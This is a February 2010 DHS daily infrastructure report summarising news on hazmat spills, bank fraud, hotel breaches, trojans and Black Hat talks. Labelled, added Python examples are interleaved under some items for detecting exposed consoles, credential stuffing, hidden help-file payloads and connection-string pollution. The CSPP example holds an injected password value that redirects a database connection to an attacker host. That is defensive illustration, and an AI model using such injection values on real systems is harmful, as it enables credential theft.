Department of Homeland Security Daily Open Source Infrastructure Report

Thursday, February 4, 2010

Complete DHS Daily Report for February 4, 2010

Daily Report

Top Stories

According to the Columbus Dispatch, all eastbound and westbound lanes along a 4-mile stretch of I-70 in Madison County, Ohio were closed for about an hour Tuesday evening after a 6,900 gallon tanker leaked about 100 gallons of acetone. (See item 7)

7. February 3, Columbus Dispatch – (Ohio) Tanker leak closes I-70 in Madison County. All eastbound and westbound lanes along a 4-mile stretch of I-70 in Madison County were closed for about an hour the evening of February 2 after a tanker was discovered to be leaking a hazardous chemical. The Madison County sheriff’s office reported at 8:30 p.m. that a 6,900 gallon tanker was leaking acetone in the westbound lane at mile post 83 between the exits for Rts. 29 and 142. The eastbound lanes were reopened at 9:30 p.m., and all but one westbound lane had reopened by 10:25 p.m. About 100 gallons of acetone spilled, a State Highway Patrol dispatcher said. Acetone is a colorless flammable solvent that is used in products from paint thinner to nail polish remover. There was no accident and no injuries were reported. A number of area fire departments, a hazardous material unit and the Ohio Environmental Protection Agency responded. Source:

The Galveston Daily News reports that the U.S. Coast Guard is investigating an incident last week in which Carnival Cruise Line’s Ecstasy struck the passenger gangway at the Texas Cruise Ship Terminal at Pier 25, knocking the $1.8 million structure out of commission, possibly for weeks. (See item 30)

30. February 2, Galveston Daily News – (Texas) Cruise ship damages gangway. The U.S. Coast Guard is investigating an incident last week in which Carnival Cruise Line’s Ecstasy struck the passenger gangway at the Texas Cruise Ship Terminal at Pier 25, knocking the $1.8 million structure out of commission, possibly for weeks. No one was injured in the collision, which occurred about 8 a.m. Thursday as the ship’s captain was attempting to turn the 855-foot Ecstasy around in the channel, port officials said. “While turning around in the channel, the rear of the ship nudged the gangway and pushed it about 15 feet along the wharf and about 3 feet toward the terminal — but not into the terminal,” the Port Director said. The Coast Guard has ruled out drug and alcohol use as the cause of the crash, but it had not completed its investigation nor determined the cause of the accident, a spokesman said. Source:


Banking and Finance Sector

21. February 3, Bloomberg – (International) Explosion at Darwin insurance office injures 15. Fifteen people were admitted to the hospital in the northern Australian city of Darwin Wednesday after an explosion at an insurance office, officials said. A man is in custody and the major crimes unit is probing the blast at the Territory Insurance Office, Northern Territory police said. A “disgruntled claimant” was behind the attack, wheeling a shopping trolley containing three jerry cans and fireworks into the office, the Australian Broadcasting Corp. reported. “This is not a terrorist incident,” the broadcaster cited a commander as saying. Four people were in a serious though stable condition after being treated for burns and respiratory problems caused by smoke inhalation, a spokeswoman for Royal Darwin Hospital said in a telephone interview. The rest were stable and expected to be discharged later today. Six staff members were among those injured, TIO’s chief executive said in an e-mailed statement. Police “believe this is an isolated incident and there is no ongoing threat to TIO, its staff or its customers,” the chief executive said. Nevertheless, security has been stepped up “at all our offices and branches.” TIO is Australia’s only government-owned commercial and financial services provider. Source:

22. February 3, ComputerWorld – (International) Old security flaws still a major cause of breaches, says report. An overemphasis on tackling new and emerging security threats may be causing companies to overlook older but far more frequently exploited vulnerabilities, according to a recent report. The report, from Trustwave, is based on an analysis of data gathered from more than 1,900 penetration tests and over 200 data breach investigations conducted on behalf of clients such as American Express, MasterCard, Discover, Visa and several large retailers. The analysis shows that major global companies are employing “vulnerability chasers” and searching out the latest vulnerabilities and zero-day threats while overlooking the most common ones, the report said. As a result, companies continue to be felled by old and supposedly well-understood vulnerabilities rather than by newfangled attack tools and methods. For instance, the top three ways hackers gained initial access to corporate networks in 2009 were via remote access applications, trusted internal network connections and SQL injection attacks, Trustwave found. The most common vulnerability that Trustwave discovered during its external network penetration tests involved the management interfaces for Web application engines such as WebSphere and ColdFusion. In many cases, the management interfaces were accessible directly from the Internet and had little or no password protection, potentially allowing attackers to deploy their own malicious applications on the Web server. Source:
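The exposed management interfaces Trustwave describes can be spotted after the fact in the web server's own access log. The following is an added example, not Trustwave's tooling or code from the report: it reads Apache/nginx combined-format access log lines (the sample lines are constructed), treats the default ColdFusion Administrator path (/CFIDE/administrator/) and WebSphere administrative console path (/ibm/console/) as management interfaces, and reports every request that reached them from an address outside RFC 1918 space. Treating RFC 1918 space as "inside" and the consoles being at their default paths are assumptions; a real audit adds the organisation's own ranges and any relocated paths.

```python
import re
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Apache/nginx "combined" log format: client, ident, user, [time], "METHOD PATH PROTO", status, bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Default URL prefixes of the two admin consoles the report names
# (assumption: the products were deployed with their default paths).
ADMIN_PREFIXES = ("/cfide/administrator/", "/ibm/console/")

# Assumption: RFC 1918 space is "inside". A real audit adds the organisation's own public ranges.
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"), ip_network("192.168.0.0/16")]

# Constructed sample log: two internal hits, and two outside addresses reaching the consoles.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Feb/2010:09:12:01 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 4120
198.51.100.23 - - [03/Feb/2010:09:13:44 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 4120
198.51.100.23 - - [03/Feb/2010:09:14:02 +0000] "POST /CFIDE/administrator/enter.cfm HTTP/1.1" 302 0
203.0.113.9 - - [03/Feb/2010:09:20:17 +0000] "GET /ibm/console/logon.jsp HTTP/1.1" 200 2210
203.0.113.9 - - [03/Feb/2010:09:21:05 +0000] "GET /index.html HTTP/1.1" 200 512
192.168.1.20 - - [03/Feb/2010:09:25:30 +0000] "GET /ibm/console/logon.jsp HTTP/1.1" 200 2210
"""


def is_internal(addr: str) -> bool:
    """True when the client address falls inside one of INTERNAL_NETS."""
    try:
        ip = ip_address(addr)
    except ValueError:
        return False  # unparsable client field: treat as external so it is not silently ignored
    return any(ip in net for net in INTERNAL_NETS)


def find_external_admin_access(lines):
    """Map each external client IP to the (path, status) requests it made to an admin console.

    Every status is reported, not just 200: a 302 to a login page or a 401 still proves the
    console is reachable from the Internet, which is the exposure the report describes.
    """
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _when, _method, path, status, _size = m.groups()
        if path.lower().startswith(ADMIN_PREFIXES) and not is_internal(client):
            hits[client].append((path, int(status)))
    return dict(hits)


if __name__ == "__main__":
    for client, requests in find_external_admin_access(SAMPLE_LOG.splitlines()).items():
        print(client, requests)
```

Run against a real log, the output is a list of outside addresses that have already found the console; an empty result says nothing about whether it is reachable, only that nobody has been logged touching it, so the check complements rather than replaces an external scan.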

23. February 3, NBC Connecticut – (Connecticut) Local bank hit by second multi-million scheme. Just weeks after a trio, including a husband, his wife and her ex-husband, were arrested and accused of trying to bilk Webster Bank out of more than $6 million, the troubles for the Waterbury-based bank have escalated and might be $11 million worse. On February 2, the company released a statement about an “elaborate embezzlement scheme” at a subcontractor that provides bulk cash processing on behalf of one of the bank’s major vendors. No customers were affected, according to the bank. The subcontractor has paid back some of the money, according to the bank, and has insurance to cover the whole loss. This is the second multimillion-dollar hit the local bank chain has suffered in recent years. Source:

24. February 3, New York Daily News – (New York) Auto insurance fraud on rise in New York State and motorists are paying the bill. Auto insurance fraud is beginning to soar in New York - and so are drivers’ rates. The Daily News has learned suspected fraud cases have jumped 33 percent since 2006. And this has hurt drivers in their wallets: Auto insurance rate hikes averaged 6.3 percent last year, the state says. Companies inundated the state Insurance Department with 13,433 complaints of suspected no-fault auto-insurance fraud last year - up from the 10,117 incidents flagged just three years earlier. The scams are pervasive in and around the city, particularly in the Bronx and Brooklyn, Insurance Department statistics and industry experts reveal. In many cases, experts say, accidents are staged and corrupt medical clinics submit fraudulent claims for treatment that was either not performed or not medically necessary. As fraud cases have risen, so have the average payouts per auto insurance injury claim. They have soared 55 percent since 2004 and are now more than double the national average. Source:

25. February 2, Forbes – (National) Cybercrime checks into the hotel industry. Over the past year America’s hotels have had some uninvited guests: a wave of increasingly sophisticated invasions by organized cybercriminals. That’s one finding of a report that a cybersecurity researcher plans to present on February 2 at the Black Hat security conference in Arlington, Virginia. His data shows a spike in hacking incidents that successfully targeted hotels and resorts, what the researcher describes as relatively unprotected sources of thousands or even millions of credit card account details. The researcher, who works as a security auditor and data breach investigator for the security firm Trustwave, plans to outline the results of around 1,900 audits and 200 breach investigations that his company performed over the last year. The central anomaly in that data: While only 3% of the audits Trustwave performed proactively for companies were commissioned by the hospitality industry, hotels and resorts were victims in 38% of investigations following successful cybercriminal attacks. That’s a new phenomenon for Trustwave, whose hospitality breach investigations were “practically nonexistent” in 2008, the researcher said. He argues that rather than searching many industries for vulnerable targets, hackers are increasingly targeting specific sectors whose systems they know to be accessible and lucrative. “The hospitality industry was the flavor of the year for cybercrime,” the researcher said. “These companies have a lot of data, there are easy ways in and the intrusions can take a very long time to detect.” Source:

26. February 1, Reno Gazette-Journal – (Nevada) Police in Reno track growing number of ATM skimming attacks. The Reno Gazette-Journal reports that debit and credit cards in the area have been compromised and used for purchases totaling hundreds of dollars at stores in states as far away as Florida and Ohio. The compromised cards have been linked to ATM transactions, too. The paper says that dozens of Reno residents have reported being the victims of similar crimes over the last six months. The surge in reports prompted police to track the fraud. A detective with the Reno police Financial Crimes Unit says Eastern European organized crime groups have taken advantage of data breaches at financial institutions to clone credit and debit cards using computer software and cardstock with a magnetic stripe. This week, police arrested a Bulgarian man in Massachusetts in connection with an international ATM-skimming ring that allegedly stole money from hundreds of accounts in the area. Skimming is a growing problem, in Reno and other parts of the United States. The U.S. Secret Service estimated an annual loss of $1 billion specifically from ATM skimming. Source:

Information Technology

56. February 3, Network World – (International) Black Hat: Researcher claims hack of chip used to secure computers, smartcards. A researcher with expertise in hacking hardware Tuesday detailed at the Black Hat DC conference how it’s possible to subvert the security of a processor used to protect computers, smartcards and even Microsoft’s Xbox 360 gaming system. A researcher at Flylogic Engineering said he has hacked an Infineon SLE 66 CL PC processor that is also used with Trusted Platform Module (TPM) chips. He emphasized that his research shows TPM, which was developed as an industry specification for hardware-based computer security by the Trusted Computing Group and has been implemented in hardware by Infineon and other manufacturers, is not as secure as presumed. TPM can be used for a wide variety of purposes, including storage of encryption keys and is used with Microsoft’s BitLocker encryption technology. The researcher’s method, as he described it, entailed jumping the wire into the internal circuitry of the Infineon chips to create a bypass into the core. The researcher acknowledged it took him six months to figure out how to effectively penetrate it, which required bypassing circuitry on chips he purchased inexpensively from Chinese manufacturers. Source:

57. February 3, The Register – (International) Warez backdoor allows hackers to pwn Twitter accounts. Twitter has lifted the lid on its recent advice to many users to reset their passwords for the micro-blogging site. Originally, it was thought that the guidance had come in response to a common or garden phishing attack. In a post on February 2, Twitter explained that the attack was actually far more devious and elaborate. Hackers established Torrent user sites and forums with hidden backdoors. They waited for these forums to grow in popularity before they harvested login details. These login credentials were then used in attempts to break into accounts on third party sites such as Twitter. The attack relied on the frequent mistake of using the same user ID and password combination on multiple sites: victims had used the same combination on the warez forums and on Twitter, and because unidentified hackers had backdoor access to those forums, the Twitter accounts were exposed as well. Twitter detected the attack after it became suspicious of a “sudden surge in followers” to two previously obscure accounts last week. Followers of these accounts were advised to change their passwords over concerns that the hackers involved had compromised their accounts in order to gain more followers on Twitter. It is unclear how many profiles were taken over or what other sites might have been involved. All of it might have been prevented by a rudimentary precaution: a different password for every site. Source:
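Password reuse turns the breach of one site into a credential-stuffing run against every other site its users visit, which is the pattern behind the Twitter resets. The following is an added example, not Twitter's detection (which, per the article, keyed on a surge in followers) and not code from the article: it runs over constructed login records and flags a source address that tries many distinct usernames inside a short window, then lists which of those logins succeeded, since those are the accounts whose owners most likely reused a forum password. The log format, the window and the threshold are assumptions.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed "timestamp client user result" login records: one address walking down a
# leaked user list (two of the reused passwords work), and an ordinary user who mistypes once.
SAMPLE_LOGINS = """\
2010-02-02T10:00:01 203.0.113.7 alice FAIL
2010-02-02T10:00:09 203.0.113.7 bob FAIL
2010-02-02T10:00:17 203.0.113.7 carol FAIL
2010-02-02T10:00:24 203.0.113.7 dave OK
2010-02-02T10:00:31 203.0.113.7 erin FAIL
2010-02-02T10:00:40 203.0.113.7 frank FAIL
2010-02-02T10:00:48 203.0.113.7 grace FAIL
2010-02-02T10:00:55 203.0.113.7 heidi OK
2010-02-02T10:02:10 198.51.100.4 carol FAIL
2010-02-02T10:02:25 198.51.100.4 carol OK
"""


def parse_logins(text):
    """Return (timestamp, client, user, succeeded) tuples sorted by time."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        when, client, user, result = line.split()
        events.append((datetime.fromisoformat(when), client, user, result == "OK"))
    return sorted(events)


def find_stuffing(events, window=timedelta(minutes=5), min_users=5):
    """Flag clients that try at least `min_users` distinct usernames within `window`.

    A sliding window per client keeps a count of the usernames currently inside it; the peak
    distinct count is the signal. For a flagged client, the usernames whose login succeeded
    are returned as the probable reused-password victims. Thresholds are assumptions.
    """
    by_client = defaultdict(list)
    for ev in events:
        by_client[ev[1]].append(ev)

    findings = {}
    for client, evs in by_client.items():
        active, left, peak = Counter(), 0, 0
        for when, _, user, _ in evs:
            active[user] += 1
            while when - evs[left][0] > window:  # slide the left edge forward
                old = evs[left][2]
                active[old] -= 1
                if active[old] == 0:
                    del active[old]
                left += 1
            peak = max(peak, len(active))
        if peak >= min_users:
            findings[client] = {
                "distinct_users": peak,
                "compromised": sorted({user for _, _, user, ok in evs if ok}),
            }
    return findings


if __name__ == "__main__":
    for client, info in find_stuffing(parse_logins(SAMPLE_LOGINS)).items():
        print(client, info)
```

The successful logins inside a flagged burst are the ones to force a reset on, which is the same remediation Twitter applied; the failed ones are a list of usernames the attacker holds and are worth a watch for later, slower attempts from other addresses.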

58. February 3, The Register – (International) Stubborn trojan stashes install file in Windows help. Security researchers have spied malware that stashes a copy of itself in a Windows help file to ensure victim computers remain infected. The trojan, dubbed Muster.e by anti-virus provider McAfee, modifies a Windows help file called imepaden.hlp so that it stores the main components of the malware in encrypted form. If the installed malware is removed, the hidden payload is decrypted into an executable file called upgraderUI.exe and run by a companion installation file that automatically runs as a Windows service. “This is hiding in plain sight,” said a threat researcher at McAfee Labs. “The help file trick is pretty new to us. Usually on the client, we don’t see this very often.” The technique ensures Muster.e remains installed on an infected PC even if most of the files associated with the malware are removed, and it has no doubt perplexed its share of users who cannot work out why their PCs keep getting reinfected. Source:
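The hiding place the researchers describe, an otherwise legitimate .hlp file carrying an encrypted payload, can be checked for using the help file's own header. The following is an added example, not McAfee's detection logic and not derived from the Muster.e sample: a WinHelp file starts with the magic value 0x00035F3F followed by three little-endian int32 fields, the last of which, EntireFileSize, records the length the file is supposed to have. The function compares that field with the real length and measures the entropy of whatever lies beyond it; kilobytes of near-8-bits-per-byte data after the declared end is the signature of appended encrypted or compressed content. The sample blobs are constructed (a valid header plus filler, no real help directory), and "appended after the declared end" is an assumption about where such a payload would sit, not a claim about how Muster.e lays it out.

```python
import math
import struct

HLP_MAGIC = 0x00035F3F
# WinHelp header: Magic, DirectoryStart, FirstFreeBlock, EntireFileSize (four little-endian int32s)
HEADER = struct.Struct("<iiii")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 means every byte value is equally frequent, as in encrypted data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def inspect_hlp(blob: bytes) -> dict:
    """Compare the header's EntireFileSize with the real length and grade any overlay."""
    if len(blob) < HEADER.size:
        return {"is_hlp": False, "reason": "too short"}
    magic, _dir_start, _first_free, declared = HEADER.unpack_from(blob)
    if magic != HLP_MAGIC:
        return {"is_hlp": False, "reason": "bad magic"}
    # A truncated file (declared > actual) yields no overlay; that is a different anomaly.
    overlay = blob[declared:] if 0 < declared <= len(blob) else b""
    entropy = shannon_entropy(overlay)
    return {
        "is_hlp": True,
        "declared_size": declared,
        "actual_size": len(blob),
        "overlay_bytes": len(overlay),
        "overlay_entropy": round(entropy, 2),
        # Thresholds are assumptions: a little zero padding is normal, kilobytes of
        # near-random bytes after the declared end are not.
        "suspicious": len(overlay) >= 64 and entropy > 7.0,
    }


def make_sample(body: bytes, overlay: bytes = b"") -> bytes:
    """Constructed test blob: a valid header whose EntireFileSize covers header+body only.
    It is not a loadable help file (no directory is built); only the header matters here."""
    declared = HEADER.size + len(body)
    return HEADER.pack(HLP_MAGIC, HEADER.size, -1, declared) + body + overlay


# Constructed stand-in for an encrypted payload: every byte value appears equally often.
CONSTRUCTED_PAYLOAD = bytes((i * 131 + 7) % 256 for i in range(1024))

if __name__ == "__main__":
    print(inspect_hlp(make_sample(b"Help text " * 50)))
    print(inspect_hlp(make_sample(b"Help text " * 50, CONSTRUCTED_PAYLOAD)))
```

A payload stored inside the help file's internal file system rather than after its end would pass this check, so it is a cheap triage filter for a directory of .hlp files, not a replacement for comparing them against known-good copies from installation media.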

59. February 2, PC World – (International) Apple iPhone, iPod touch security patch: what’s fixed. Apple on February 2 released an updated version of its iPhone OS software for the iPhone and iPod touch. The new version 3.1.3 patches several security holes, provides a few bug fixes and minor enhancements, and is available via iTunes download. The five security fixes are related to CoreAudio, ImageIO, Recovery Mode, and WebKit. The CoreAudio patch prevents “maliciously crafted” MP4 audio files from terminating applications or executing arbitrary code. The ImageIO fix blocks malicious TIFF images from doing the same when users view them. The Recovery Mode update prevents someone with physical access to a locked iPhone or iPod touch from bypassing the passcode and accessing the user’s data; it corrects a memory corruption bug in the handling of a USB control message that made the bypass possible. WebKit gets two patches. One corrects an HTML 5-related problem that could cause Mail to load remote audio and video files even when remote image loading is turned off. The second blocks WebKit from accessing a malicious FTP server. Source:

60. February 2, Information Week – (International) Homeland Security plans cybersecurity, data center investments. The Department of Homeland Security is looking to invest nearly $900 million in fiscal 2011 on technology projects that include bolstering cybersecurity and continued work on a data center consolidation project that’s already underway. Other IT priorities listed as part of the department’s proposed $56.3 billion budget, unveiled on February 1, include improvements to an existing Internet-based verification program that lets employers check that someone is legally allowed to work in the United States and technology for airport security. DHS is asking for $379 million to go to its National Cyber Security Division (NCSD) to develop capabilities for preventing and responding to cyber attacks. The department plans to use the money to identify and reduce vulnerabilities within both its .gov and .com Internet domains, officials said on a conference call. NCSD is a division within DHS that’s meant to work collaboratively with public, private, and international organizations to secure cyberspace and the U.S. government’s cyber infrastructure. At the same time that it’s investing in cybersecurity, the U.S. President’s administration has made several key appointments to oversee such efforts. Homeland Security is requesting $192.2 million in its FY 2011 budget to continue migrating applications and systems from 24 data centers to two enterprise-wide data centers. The project was started after its inspector general, in 2005, reported deficiencies in the department’s IT disaster-recovery planning. Source:

61. February 2, DarkReading – (International) Black Hat DC: Researchers reveal connection string ‘Pollution’ attack. A pair of Spanish researchers today demonstrated a way to hijack the connection between a Web application and its database, letting the attacker hijack Web credentials and perform other nefarious activities. The so-called Connection String Parameter Pollution (CSPP) attack exploits poorly secured dynamic connections between Web apps and databases: connection strings that are assembled by concatenating user-supplied values such as the user ID and password into a semicolon-separated list of parameters (data source, user ID, password, and so on). “If an attacker pollutes the parameter she will have full control of the connection string and can overwrite anything in it,” says a researcher with Informatica 64, who along with a colleague demonstrated the CSPP attack. The two say CSPP also lets an attacker steal hashes and scan ports on a server. They also released a tool today called CSPP Scanner that allows organizations to test whether they are vulnerable to this form of attack. CSPP works by injecting phony parameters, separated by semicolons, into the connection string the Web application uses to authenticate a user to the database, which allows the attacker to take over the application and the way it authenticates, the researchers say. This type of attack is easy to execute, they say, and thus likely to be exploited. Source:
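CSPP works because of how a connection string is parsed: ';' separates key=value pairs and, in ADO.NET-style parsers, a key that appears more than once takes its last value, so a parameter injected at the end of the string silently overrides the one the application wrote at the front. The following is an added example, not the researchers' CSPP Scanner and not code from the talk: a small quote-aware parser with that last-wins rule, a vulnerable builder that concatenates user input, a hardened builder that double-quotes each value (an escaping rule ADO.NET honours; with other drivers use their own builder class), and an audit function that reports duplicated keys. Host names, parameter names and the "steal hashes" mechanism in the comment (the server authenticating to an attacker-controlled host) are assumptions, the last being one reading of what the article only names.

```python
from collections import Counter


def tokenize(conn: str):
    """Return (key, value) pairs in order of appearance.

    Rules modelled (assumption: ADO.NET-style parsing): ';' separates pairs, '=' separates key
    from value, keys are case-insensitive, and inside a double-quoted value ';' and '=' are
    literal, with an embedded quote written as "".
    """
    pairs, buf, key = [], [], None
    in_quotes, reading_key = False, True
    s = conn + ";"
    i = 0
    while i < len(s):
        ch = s[i]
        if ch == '"' and not reading_key:
            if in_quotes and s[i + 1:i + 2] == '"':
                buf.append('"')
                i += 2
                continue
            in_quotes = not in_quotes
        elif ch == "=" and reading_key and not in_quotes:
            key = "".join(buf).strip().lower()
            buf, reading_key = [], False
        elif ch == ";" and not in_quotes:
            if key is not None:
                pairs.append((key, "".join(buf).strip()))
            buf, key, reading_key = [], None, True
        else:
            buf.append(ch)
        i += 1
    return pairs


def parse_connection_string(conn: str) -> dict:
    """Last-wins view: a repeated key takes its final value, which is exactly what lets an
    injected 'Data Source=' override the one the application wrote first."""
    return dict(tokenize(conn))


def duplicate_keys(conn: str) -> list:
    """Audit check: keys occurring more than once, in order of first appearance.
    A string assembled by the application alone should never produce any."""
    pairs = tokenize(conn)
    counts = Counter(k for k, _ in pairs)
    dups = []
    for k, _ in pairs:
        if counts[k] > 1 and k not in dups:
            dups.append(k)
    return dups


def build_vulnerable(user: str, password: str) -> str:
    """The pattern CSPP abuses: untrusted input pasted straight into the string."""
    return f"Data Source=db.internal;Initial Catalog=app;User ID={user};Password={password}"


def quote_value(value: str) -> str:
    """Double-quote a value and escape embedded quotes so its separators become literal."""
    return '"' + value.replace('"', '""') + '"'


def build_hardened(user: str, password: str) -> str:
    """Same string with every untrusted value quoted (a driver's own builder class is better still)."""
    return (f"Data Source=db.internal;Initial Catalog=app;"
            f"User ID={quote_value(user)};Password={quote_value(password)}")


# Constructed attacker input: a "password" that smuggles in extra parameters. Redirecting
# Data Source to the attacker's host while switching on integrated authentication makes the
# server authenticate to a listener the attacker controls (assumption: one way the
# hash-theft the researchers mention could work; the article gives no detail).
POLLUTED_PASSWORD = "x;Data Source=attacker.example;Integrated Security=true"

if __name__ == "__main__":
    for build in (build_vulnerable, build_hardened):
        conn = build("bob", POLLUTED_PASSWORD)
        print(build.__name__, parse_connection_string(conn)["data source"], duplicate_keys(conn))
```

Quoting stops the injection only if the parser's quoting rules are the ones assumed here; the dependable fix is to never build the string by hand and to let the driver's builder type (for instance a SqlConnectionStringBuilder in ADO.NET) escape each value, and the duplicate-key audit is a cheap runtime guard to log and refuse any string that still comes out polluted.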

62. February 2, IDG News Services – (National) Senator questions tech companies on China activities. A U.S. senator is seeking information from 30 technology companies in advance of a hearing he is planning on their human rights practices in China. The move comes in response to Google’s recently announced plans to stop censoring search results in China after discovering that its systems had been broken into by hackers based in China. Google discovered that not only had some of its intellectual property been stolen, but the Gmail accounts of activists supporting human rights in China had also been compromised. The senator asks the companies to detail their businesses in China and what measures, if any, they will implement to ensure that their products and services do not facilitate human rights abuses by the Chinese government. He also urges them to sign on to a code of conduct outlined by the Global Network Initiative. Companies that did not respond at all to the senator’s original letter and that have now been sent new letters include Twitter, Toshiba, Acer and Juniper. Others that did respond to the letter last year but were questioned again in the new letter include Apple, AT&T, Cisco, Dell, eBay, Facebook, Hewlett-Packard, McAfee, News Corp., Nokia, Skype, Sprint Nextel, Verizon, Vodafone and Websense. Amazon, IAC, IBM, Oracle, Research In Motion and SAP were questioned for the first time. Source:

63. February 2, Infosecurity – (International) Attack fools iPhone into trusting fake certificates. An anonymous researcher has posted a proof-of-concept attack that fakes a trusted root certificate on the iPhone. Researchers have confirmed that the attack works, making it possible for anyone to create a web page that is deemed to be trusted by Apple. While not allowing for remote code execution, the fake certificate flaw could enable many other attacks on an iPhone. “By setting a new HTTP proxy, it is possible to re-direct all HTTP traffic from the iPhone to an arbitrary server on the net. Modifying root certificates makes it possible to act as man-in-the-middle to hijack SSL (HTTPS) connections too,” the researcher said. “Obnoxious modifications can be brought to the phone like prohibiting the use of Safari, mail and other apps, or adding extra VPN, WiFi or email settings.” The server providing the certificate to an iPhone issues a file requesting the iPhone’s credentials. The file is called a mobileconfig file, which is used by the iPhone to issue a request to a provisioning server. The iPhone uses an Apple-signed certificate to sign its own credentials when making a request, which requires a chain of trust to be established up to the root CA. The researchers jailbroke an iPhone to gain access to this root of trust, and found that the self-signed root certificate used by Apple is not the same as the one published on Apple’s website – even though the key ID is the same. Source:

For another story, see item 65 below in the Communications Sector

Communications Sector

64. February 2, Grand Rapids Press – (Michigan) WZZM TV-13 boosts transmission, helping antenna problems. WZZM 13, a Gannett-owned ABC affiliate, announced on February 2 it will be increasing its transmission power by 50 percent, which may solve antenna users’ reported problems of not being able to receive the station since the transition to digital (DTV) in June. Work to increase the station’s power will run 1-3 a.m. on February 3. WZZM will not be broadcasting during this time. The process also affects DIRECTV users and some cable systems, but remaining users should still receive the station. Source:

65. February 1, – (International) US branded dirtiest web hosting nation. Experts at security firm Sophos have branded the US as the “dirty man of the web world” after new research from the vendor identified the country as the top host of infected sites. Over a third of the world’s infected sites are hosted in the US, ahead of Russia with 12.8 percent and China with 11.2 percent, according to the Sophos Security Threat Report 2010. The UK came tenth with 1.6 percent. The report covers malicious sites deliberately set up to lure victims with “promises of desirable or salacious content”, and the more recent trend of infecting legitimate sites with malware via SQL injection or other attacks, Sophos’ senior technology consultant said. Source: